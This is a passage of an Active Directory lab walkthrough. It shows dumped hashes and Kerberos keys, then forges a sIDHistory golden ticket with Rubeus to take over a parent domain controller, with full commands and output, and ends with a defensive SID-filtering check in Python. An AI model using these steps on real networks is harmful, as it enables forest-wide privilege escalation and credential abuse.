LABDC$:1000:aad3b435b51404eeaad3b435b51404ee:2e1b1bcabeb4f62d6bbea5366543f4ff:::
TRUSTED$:1103:aad3b435b51404eeaad3b435b51404ee:fdb9239325aed982da5f521116ffbcaf:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:ef0dd1293ef26fdcb054dfecd324e272037f8af708bd2d6289d4010075605eb3
Administrator:aes128-cts-hmac-sha1-96:8487e135528f40d60c99a45b071bbf86
Administrator:des-cbc-md5:b64aef752657b3c8
krbtgt:aes256-cts-hmac-sha1-96:c930ddb15c3f84aafa01e816abc1112e38430b574ae3fcdd019e77bc906494aa
krbtgt:aes128-cts-hmac-sha1-96:db0b41cedf222df3808858fc41bb0c02
krbtgt:des-cbc-md5:0e89167916c134ad
lab.trusted.vl\rsmith:aes256-cts-hmac-sha1-96:b1dd0c20df2dc7638ded51d85ba03682ea308444b4121a10b8e4fa3c24872a41
lab.trusted.vl\rsmith:aes128-cts-hmac-sha1-96:631ba36ba1aaf36135ba4b382dd41590
lab.trusted.vl\rsmith:des-cbc-md5:ae892f45c12fbc5e
lab.trusted.vl\ewalters:aes256-cts-hmac-sha1-96:6408f007a75c725b882a69e6cf22a2218f7ac4d6ddce9f4fb109ae5690472b90
lab.trusted.vl\ewalters:aes128-cts-hmac-sha1-96:bcc44f6ca3403c468757c8cd470d4eb3
lab.trusted.vl\ewalters:des-cbc-md5:86617f4046586410
lab.trusted.vl\cpowers:aes256-cts-hmac-sha1-96:cfd7dce3d0c1a17ae08fc653769ddd382b116b3708197f5d251764dab318d39e
lab.trusted.vl\cpowers:aes128-cts-hmac-sha1-96:413bcdb4a908e53f133a9c660006c0b9
lab.trusted.vl\cpowers:des-cbc-md5:32ab807a018ac89d
0x5001:aes256-cts-hmac-sha1-96:292edbdda5879fe0ac6de4ceef1f2736d10e658f3dccae03aa4fd1cb69701917
0x5001:aes128-cts-hmac-sha1-96:cfa272f2a20017a2f9157ab626dd69e3
0x5001:des-cbc-md5:d5f7803e6d3b4f45
LABDC$:aes256-cts-hmac-sha1-96:66314ebc733a8e2c7ad1981df445e830b86708fa0f30b37d5fb5af648c74c7ed
LABDC$:aes128-cts-hmac-sha1-96:ad8d9d4948dc22086365ab383785a0b6
LABDC$:des-cbc-md5:19ef9e9dadb994f7
TRUSTED$:aes256-cts-hmac-sha1-96:5d0662699bd569757e26309c9456678dd0b40d78180383901833bc58ee0fefe5
TRUSTED$:aes128-cts-hmac-sha1-96:f8cf982ff24fa7ff66a6aff2b078efa1
TRUSTED$:des-cbc-md5:64c72cb6e3bace79
[*] Cleaning up... 

OK, there are 3 domain users in our child domain (lab.trusted.vl).

Also, there is a parent domain (trusted.vl).

We just got access to the child domain DC and its users. We are free to forge a TGT to access the parent domain’s services. If we can inject a privileged group RID into the TGT, we will access any of the parent domain’s services as a privileged user. This is a “sIDHistory” injection attack: basically, we are aiming to create a golden ticket that will be used in the parent domain, a golden TGT with an abused sIDHistory property.

What we need to create a TGT:

  • Impersonated username
  • Current domain name
  • Current domain’s “krbtgt” account’s NT hash (It’s the same as RC4 key.)
  • Current domain’s SID
  • Impersonated group RID

Tip: In Active Directory environments, the forest is the security boundary by design.

Tip: Machine accounts’ password are set by Windows and machine accounts ends with $ sign.

Tip: As always, “krbtgt” account’s NT hash is used to create TGT by design.

We use “Rubeus.exe” to create an inter-realm TGT ticket.

Firstly, find required values to use in parameters.

These parameters are executed on RDP client.

PS C:\Users\0x5001\Desktop> (Get-ADDomain).DomainSID.Value
S-1-5-21-2241985869-2159962460-1278545866
PS C:\Users\0x5001\Desktop> Get-ADGroup -Server trusted.vl -Filter *


DistinguishedName : CN=Administrators,CN=Builtin,DC=trusted,DC=vl
GroupCategory     : Security
GroupScope        : DomainLocal
Name              : Administrators
ObjectClass       : group
ObjectGUID        : 52f8332f-e6c7-4e2f-aee8-acb59c82a0bf
SamAccountName    : Administrators
SID               : S-1-5-32-544

DistinguishedName : CN=Users,CN=Builtin,DC=trusted,DC=vl
GroupCategory     : Security
GroupScope        : DomainLocal
Name              : Users
ObjectClass       : group
ObjectGUID        : 27e4e80d-6222-4c10-a65a-dec032de51c6
SamAccountName    : Users
SID               : S-1-5-32-545

<SNIPPED>

DistinguishedName : CN=Enterprise Admins,CN=Users,DC=trusted,DC=vl
GroupCategory     : Security
GroupScope        : Universal
Name              : Enterprise Admins
ObjectClass       : group
ObjectGUID        : 9e72548e-1fda-486c-b426-6bcb7f171253
SamAccountName    : Enterprise Admins
SID               : S-1-5-21-3576695518-347000760-3731839591-519

<SNIPPED>

Current Domain SID: S-1-5-21-2241985869-2159962460-1278545866

“Enterprise Admins” Group SID: S-1-5-21-3576695518-347000760-3731839591-519

RC4 key: c7a03c565c68c6fac5f8913fab576ebd (“krbtgt” account’s NT hash)

PS C:\Users\0x5001\Desktop> .\Rubeus.exe golden /rc4:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866  /sids:S-1-5-21-3576695518-347000760-3731839591-519 /user:Administrator /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: Build TGT

[*] Building PAC

[*] Domain         : LAB.TRUSTED.VL (LAB)
[*] SID            : S-1-5-21-2241985869-2159962460-1278545866
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ExtraSIDs      : S-1-5-21-3576695518-347000760-3731839591-519
[*] ServiceKey     : C7A03C565C68C6FAC5F8913FAB576EBD
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey         : C7A03C565C68C6FAC5F8913FAB576EBD
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_MD5
[*] Service        : krbtgt
[*] Target         : lab.trusted.vl

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for '[email protected]'

[*] AuthTime       : 9/5/2024 9:41:11 PM
[*] StartTime      : 9/5/2024 9:41:11 PM
[*] EndTime        : 9/6/2024 7:41:11 AM
[*] RenewTill      : 9/12/2024 9:41:11 PM

[*] base64(ticket.kirbi):



[+] Ticket successfully imported!
PS C:\Users\0x5001\Desktop> klist

Current LogonId is 0:0x93728

Cached Tickets: (1)

#0>     Client: Administrator @ LAB.TRUSTED.VL
        Server: krbtgt/lab.trusted.vl @ LAB.TRUSTED.VL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 9/5/2024 21:41:11 (local)
        End Time:   9/6/2024 7:41:11 (local)
        Renew Time: 9/12/2024 21:41:11 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

PS C:\Users\0x5001\Desktop> winrs -r:trusteddc.trusted.vl cmd

Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator.LAB>
C:\Users\Administrator.LAB>

C:\Users\Administrator.LAB>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : eu-central-1.compute.internal
   IPv4 Address. . . . . . . . . . . : 10.10.194.133
   Subnet Mask . . . . . . . . . . . : 255.255.255.240
   Default Gateway . . . . . . . . . : 10.10.194.129

C:\Users\Administrator.LAB>hostname
hostname
trusteddc

C:\Users\Administrator>whoami /all
whoami /all

USER INFORMATION
----------------

User Name         SID
================= =============================================
lab\administrator S-1-5-21-2241985869-2159962460-1278545866-500


GROUP INFORMATION
-----------------

Group Name                                     Type             SID                                           Attributes
============================================== ================ ============================================= ===============================================================
Everyone                                       Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access     Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                  Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                         Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                           Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users               Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                 Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
LAB\Group Policy Creator Owners                Group            S-1-5-21-2241985869-2159962460-1278545866-520
LAB\Domain Admins                              Group            S-1-5-21-2241985869-2159962460-1278545866-512
                                               Unknown SID type S-1-5-21-2241985869-2159962460-1278545866-519
                                               Unknown SID type S-1-5-21-2241985869-2159962460-1278545866-518
TRUSTED\Enterprise Admins                      Group            S-1-5-21-3576695518-347000760-3731839591-519  Mandatory group, Enabled by default, Enabled group
TRUSTED\Denied RODC Password Replication Group Alias            S-1-5-21-3576695518-347000760-3731839591-572  Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level           Label            S-1-16-12288

That’s it. We are in the Enterprise Admins group! Note the two “Unknown SID type” entries: RIDs 518 and 519 (Schema Admins and Enterprise Admins) only exist in the forest root domain, so the child-domain SIDs Rubeus added by default resolve to nothing; the ExtraSID for TRUSTED\Enterprise Admins is the one that matters.
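To show why this works and what would have stopped it, here is an added example (not from the original writeup) that takes the PAC fields Rubeus printed above and applies a simplified model of SID filtering (trust quarantine), which keeps only SIDs issued by the trusted domain itself; it also performs the defender-side check of flagging privileged SIDs from a foreign domain. The domain SIDs are the ones on this page; the quarantine rule is a simplification of the real filtering logic.

```python
# Added example (not from the original writeup): a simplified model of what SID
# filtering ("quarantine") on the parent-child trust would do to the forged PAC,
# plus a defender check for privileged SIDs that come from another domain.
import re

CHILD_DOMAIN_SID = "S-1-5-21-2241985869-2159962460-1278545866"   # lab.trusted.vl
PARENT_DOMAIN_SID = "S-1-5-21-3576695518-347000760-3731839591"   # trusted.vl

# RIDs of highly privileged groups; their appearance from a foreign domain is
# worth alerting on: 512 = Domain Admins, 518 = Schema Admins, 519 = Enterprise Admins.
PRIVILEGED_RIDS = {512, 518, 519}

# Domain SIDs have the form S-1-5-21-<sub1>-<sub2>-<sub3>-<RID>.
SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-(\d+)$")

def split_sid(sid):
    """Return (domain_sid, rid) for a domain SID, or (None, None) for well-known SIDs."""
    m = SID_RE.match(sid)
    if not m:
        return None, None
    return sid.rsplit("-", 1)[0], int(m.group(1))

def pac_sids(domain_sid, user_rid, group_rids, extra_sids):
    """Expand the PAC fields Rubeus printed (UserId, Groups, ExtraSIDs) into a flat SID list."""
    sids = [f"{domain_sid}-{user_rid}"] + [f"{domain_sid}-{r}" for r in group_rids]
    return sids + list(extra_sids)

def quarantine_filter(trusted_domain_sid, sids):
    """Simplified SID filtering: keep only SIDs that the trusted (child) domain itself issued."""
    return [s for s in sids if split_sid(s)[0] == trusted_domain_sid]

def foreign_privileged_sids(trusted_domain_sid, sids):
    """Defender check: PAC SIDs that belong to another domain and map to a privileged RID."""
    hits = []
    for s in sids:
        dom, rid = split_sid(s)
        if dom is not None and dom != trusted_domain_sid and rid in PRIVILEGED_RIDS:
            hits.append(s)
    return hits

if __name__ == "__main__":
    # Values taken from the "Building PAC" section of the Rubeus output above.
    forged = pac_sids(CHILD_DOMAIN_SID, 500, [520, 512, 513, 519, 518],
                      [f"{PARENT_DOMAIN_SID}-519"])
    print("PAC SIDs after filtering:", quarantine_filter(CHILD_DOMAIN_SID, forged))
    print("Foreign privileged SIDs :", foreign_privileged_sids(CHILD_DOMAIN_SID, forged))
```

With quarantine applied the injected Enterprise Admins SID is dropped, which is why the attack only works because intra-forest trusts do not filter SIDs by default.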